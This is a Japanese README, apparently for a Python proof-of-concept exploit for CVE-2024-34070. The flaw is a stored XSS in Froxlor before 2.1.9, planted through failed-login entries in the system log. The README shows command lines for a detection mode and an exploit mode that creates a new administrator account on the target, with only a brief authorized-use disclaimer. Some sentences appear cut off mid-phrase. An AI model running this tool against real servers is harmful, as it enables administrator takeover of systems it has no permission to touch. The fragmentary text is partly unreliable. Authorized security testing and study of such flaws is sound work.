
Python による CVE-2024-34070 の概念実証 (PoC) です。これは、Froxlor 2.1.9 より前のバージョンにおいて、システムログに書き込まれるログイン失敗試行を介した格納型 XSS の問題です。
このプロジェクトは、許可を得たセキュリティテスト、CTFラボ、教育目的でのみ使用してください。所有していないシステムや、テストする明示的な許可を得ていないシステムに対して実行しないでください。エクスプロイトモードでは、対象の Froxlor インスタンスに管理者アカウントを作成できます。
< 2.1.9) かどうかを報告します。未認証の検出:
python3 main.py --url http://240.0.0.1:8080 --check
認証済みの検出。正確な Froxlor バージョンを取得するために使用します:
python3 main.py --url http://240.0.0.1:8080 --check --login admin --password 'password'
エクスプロイトモード。新しい管理者を作成します:
python3 main.py --url http://240.0.0.1:8080 --exploit \
--new-admin abcd \
--new-password 'Abcd@@1234' \
--new-email [email protected]
管理者または自動化ボットが Froxlor システムログを読み取ると、検証ステップは最終的に admin_index.php にリダイレクトされるはずです。
--check は Froxlor を確認できますが、脆弱性を厳密に判定することはできません。/admin_admins.php) を使用するため、ハードコードされたドメインではなく対象のインスタンスに対して機能します。